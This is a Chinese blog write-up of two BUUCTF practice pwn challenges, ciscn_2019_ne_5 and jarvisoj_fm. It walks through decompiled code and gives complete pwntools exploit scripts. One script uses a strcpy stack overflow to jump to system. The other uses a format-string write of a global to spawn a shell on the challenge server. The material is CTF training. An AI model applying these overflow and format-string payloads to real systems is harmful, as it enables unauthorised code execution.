BUUCTF ciscn_2019_ne_5 & jarvisoj_fm

已于 2022-11-01 01:28:37 修改
阅读量698 收藏
点赞数 1
分类专栏: Pwn 文章标签: linux 学习 python 网络安全 网络
于 2022-11-01 01:28:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29912475/article/details/127626164
版权

1.ciscn_2019_ne_5

1.1 Checksec & IDA Pro

只开起了部分RELRO与NX。

IDA中发现4个函数

 main

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int result; // eax
  int v4; // [esp+0h] [ebp-100h] BYREF
  char src[4]; // [esp+4h] [ebp-FCh] BYREF
  char v6[124]; // [esp+8h] [ebp-F8h] BYREF
  char s1[4]; // [esp+84h] [ebp-7Ch] BYREF
  char v8[96]; // [esp+88h] [ebp-78h] BYREF
  int *p_argc; // [esp+F4h] [ebp-Ch]

  p_argc = &argc;
  setbuf(stdin, 0);
  setbuf(stdout, 0);
  setbuf(stderr, 0);
  fflush(stdout);
  *(_DWORD *)s1 = 48;
  memset(v8, 0, sizeof(v8));
  *(_DWORD *)src = 48;
  memset(v6, 0, sizeof(v6));
  puts("Welcome to use LFS.");
  printf("Please input admin password:");
  __isoc99_scanf("%100s", s1);
  if ( strcmp(s1, "administrator") ) // password = administrator
  {
    puts("Password Error!");
    exit(0);
  }
  puts("Welcome!");
  puts("Input your operation:");
  puts("1.Add a log.");
  puts("2.Display all logs.");
  puts("3.Print all logs.");
  printf("0.Exit\n:");
  __isoc99_scanf("%d", &v4);
  switch ( v4 )
  {
    case 0:
      exit(0);
      return result;
    case 1:
      AddLog((int)src);
      break;
    case 2:
      Display(src);
      break;
    case 3:
      Print();
      break;
    case 4:
      GetFlag(src);
      break;
    default:
      break;
  }
  sub_804892B();
  return result;
}

GetFlag

int __cdecl GetFlag(char *src)
{
  char dest[4]; // [esp+0h] [ebp-48h] BYREF
  char v3[60]; // [esp+4h] [ebp-44h] BYREF

  *(_DWORD *)dest = 48;
  memset(v3, 0, sizeof(v3));
  strcpy(dest, src); // 栈溢出漏洞所在地 大小为 dest 的大小,0x48
  return printf("The flag is your log:%s\n", dest);
}

AddLog

int __cdecl AddLog(int a1)
{
  printf("Please input new log info:");
  return __isoc99_scanf("%128s", a1);
}

主要只需要看这3个函数。

分析:

1.使用密码 administrator 进入下一步。

2.输入输字1,修改 src

3.输入输字4,进行栈溢出,获取shell

Payload:

payload_pass = b'administrator'
system = elf.sym['system']
main = elf.sym['main']
sh = 0x80482EA

payload = b'A' * ( 0x48 + 0x04 ) + p32(system) + p32(main) + p32(sh)

完整PoC:

from pwn import *

#io = process("/root/Desktop/PwnSubjects/ciscn_2019_ne_5")
io = remote("node4.buuoj.cn",29477)
elf = ELF("/root/Desktop/PwnSubjects/ciscn_2019_ne_5")
context.log_level = 'debug'

system = elf.sym['system']
main = elf.sym['main']
sh = 0x80482EA

payload_pass = b'administrator'
payload = b'A' * ( 0x48 + 0x04 ) + p32(system) + p32(main) + p32(sh)

io.sendline(payload_pass)
io.sendline("1")
io.sendlineafter("info:",payload)
io.sendline("4")
io.interactive()

成功获取shell。

2. jarvisoj_fm

2.1 Checksec & IDA Pro

开启了Canary,NX,部分RELRO。

main 函数 

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf[80]; // [esp+2Ch] [ebp-5Ch] BYREF
  unsigned int v5; // [esp+7Ch] [ebp-Ch]

  v5 = __readgsdword(0x14u);
  be_nice_to_people();
  memset(buf, 0, sizeof(buf));
  read(0, buf, 0x50u);
  printf(buf);
  printf("%d!\n", x);
  if ( x == 4 )
  {
    puts("running sh...");
    system("/bin/sh");
  }
  return 0;
}

fmtstr_payload

由未开启PIE,获得第一种思路:

fmtstr_payload(offset,{target:target})

fmtstr_payload(偏移量,{被替换的目标:替换的目标})

构建PoC

偏移量:

AAAA-0xffbf481c[1]-0x50[2]-(nil)[3]-(nil)[4]-0xffffffff[5]-(nil)[6]-0xffbf4934[7]-0xf7f7f608[8]-0x2c[9]-0x50[10]-0x41414141[11]
[x] 代表是第几位偏移
因此是第十一位

 

from pwn import *

io = process("/root/Desktop/PwnSubjects/fm")

offset = 11
x = 0x804A02C
target = p32(4)
payload = fmtstr_payload(11,{x:target})

io.sendline(payload)
io.interactive()

成功获取shell

不使用fmtstr_payload的思路

因为要置 0x0804A02C 也就是 x 为0x4

Payload:

x = 0x804A02C

payload = p32(x)
payload2 = b'%4c%13$n'

用 %4c 输出四个字符,因为 %4c%11$n 本身占2个字符,因此是 %4c%13$n

完整PoC:

from pwn import *

#io = process("/root/Desktop/PwnSubjects/fm")
io = remote("node4.buuoj.cn","28463")

x = 0x804A02C
payload = p32(x)
payload2 = b'%4c%13$n'
io.sendline(payload2+payload)
io.interactive()

Red-Leaves
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
110m_physical_地图_ne_110m_graticules_世界地图_physical_
09-28
5. ne_110m_glaciated_areas.cpg:冰川覆盖区的数据,对于研究气候变化和冰川退缩情况至关重要。 6. ne_110m_ocean.cpg:海洋的栅格数据,标识出海洋边界和深度。 7. ne_110m_coastline.cpg:海岸线数据,定义了陆地...
【CTF】jarvisoj_fm 1
凉水的博客
07-06 526
jarvisoj_fm
BUUCTF pwn——jarvisoj_fm
CNS-Enterprise BCC-1701-J
04-13 216
BUUCTF 做题练习
【CTF】ciscn_2019_n_5
凉水的博客
04-22 931
题目分析 1 反编译,寻找可以利用的地方 main函数的反编译结果如下: int main(void) { 1 char text [30]; 2 setvbuf(stdout,(char *)0x0,2,0); 3 puts("tell me your name"); 4 read(0,name,100); 5 puts("wow~ nice name!"); 6 puts("What do you want to say to me?"); 7 gets(text);
[buuctf]ciscn_2019_n_5
逆向萌新的博客
07-03 732
[buuctf]ciscn_2019_n_5
ciscn_2019_n_5
、moddemod
06-17 302
exp #!/usr/bin/env python3 # coding=utf-8 from pwn import * from LibcSearcher import * context(log_level = 'debug') proc_name = './ciscn_2019_n_5' # p = process(proc_name) p = remote('node3.buuoj.cn', 28451) elf = ELF(proc_name) p.sendline('a'.encode()).
UEFITool_NE_A51_win32.zip
12-24
5. **引导加载器配置**:UEFITool可以用于配置和管理不同的引导加载器,比如GRUB2或Windows Boot Manager,确保系统能够正确启动。 6. **安全启动管理**:对于支持安全启动的系统,UEFITool可以帮助用户管理安全...
ATOS.rar_ATOS NE_Atos
09-19
ATOS是一个专用于无线传感器网络开发的开源平台,其核心是Atos NENetwork Element),它为开发者提供了构建和管理自定义传感器应用的框架。在这个压缩包“ATOS.rar_ATOS NE_Atos”中,我们可以预见到包含有关如何...
opengl.rar_OPENGL NE_nehe lesson_opengl nehe
09-23
5. Lesson5:深度缓冲和隐藏面消除 - 解释如何处理视觉上的遮挡问题,使图像更加真实。 6. Lesson6:纹理映射 - 教授如何将图像贴合到3D物体表面,实现复杂的表面效果。 7. Lesson7:视口和投影 - 学习如何调整...
test_eth.rar_EMAC PHY_MC9S12NE64
09-24
《MC9S12NE64的EMAC与PHY网络收发测试详解》 在嵌入式系统领域,网络通信是不可或缺的一部分。本文将详细解析标题为“test_eth.rar_EMAC PHY_MC9S12NE64”的压缩包文件所包含的MC9S12NE64网络收发测试代码,以及...
BUUCTF-ciscn_2019_n_51
Rt1Text的博客
10-09 288
没有开启保护,有可写segments,考虑shellcode。
MFOJ #353. Hello, World!
Jacky0513z的博客
10-15 357
Hello, World!
jarvisoj_fmBUUCTF
qq_41696518的博客
08-31 289
jarvisoj_fmBUUCTF
ciscn_2019_ne_5
、moddemod
06-17 385
这道题如果出现不能反编译参考文章 简单说一下思路,在AddLog中添加的数据存放在src对应的栈中,在GetFlag中因为strcpy函数存在溢出,所以直接在AddLog构造payload在strcpy中溢出就直接拿到shell了! exp #!/usr/bin/env python # coding=utf-8 from pwn import * context(log_level='debug') proc_name = './ciscn_2019_ne_5' p = process(proc_
[buuctf]ciscn_2019_ne_5
逆向萌新的博客
11-05 1621
buuctf ciscn_2019_ne_5题目分析
BUUCTF ciscn_2019_n_5
红叶的博客
10-31 1467
通过 puts 函数泄露真实地址,通过LibcSearcher查询Libc中后3位相同的Libc,dump并计算出 system 、 /bin/sh 的偏移。但是有个问题,如果本地打不进去可以尝试更换系统打,我的Kali打不进去换了个Ubuntu进去了。既然没开NX,那代表栈是可执行的,只需要构造shellcode即可直接获取shell。Payload_Name --- 用来跳过第一步的输入 name。Payload_Leak --- 用来进行溢出并获取地址。完全是裸的程序,基本上一点保护都没开。
jarvisoj_fm
小白垃圾笔记2
05-20 741
fmtstr_payload(offset,writes,numbwritten=0,write_size='byte')
BUU刷题-Pwn-jarvisoj_fm
最新发布
一个啥也不会的小菜鸡!
07-11 207
参数位置:从esp的下一个地址为第一个参数。格式化字符串漏洞,改变函数的值。%idx$n:修改某位置的内存。%numc:表示字符串长度。
[BUUOJ]jarvisoj_fm
Do1phln的博客
11-07 209
checksec为常规保护,进入IDA分析main逻辑内部判断本题应该是格式化字符串漏洞,因此进行gdb调试,下断点在漏洞printf。查找具体存储位置,发现是在第11位开始存储,所以据此构造exp。处,输入一串字符串后在gdb内。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值